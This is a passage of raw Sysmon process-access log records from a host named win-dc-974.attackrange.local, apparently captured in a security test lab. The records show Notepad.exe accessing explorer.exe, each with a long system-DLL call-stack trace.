2\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000002244144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.748{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000002244140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.686{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002244139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.686{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.686{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.686{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.686{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000002244135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.675{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002244134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.675{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002244133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.639{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13c997|C:\Windows\System32\SHELL32.dll+13be18|C:\Windows\System32\SHELL32.dll+13ba1b|C:\Windows\System32\SHELL32.dll+13bb87|C:\Windows\System32\SHELL32.dll+13bb0a|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000002244132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.639{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13c997|C:\Windows\System32\SHELL32.dll+13be18|C:\Windows\System32\SHELL32.dll+13ba1b|C:\Windows\System32\SHELL32.dll+13bb87|C:\Windows\System32\SHELL32.dll+13bb0a|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000002244131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.639{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13c997|C:\Windows\System32\SHELL32.dll+13be18 10341000x80000000000000002244130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.639{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13c997|C:\Windows\System32\SHELL32.dll+13be18|C:\Windows\System32\SHELL32.dll+13ba1b 10341000x80000000000000002244129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.639{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e9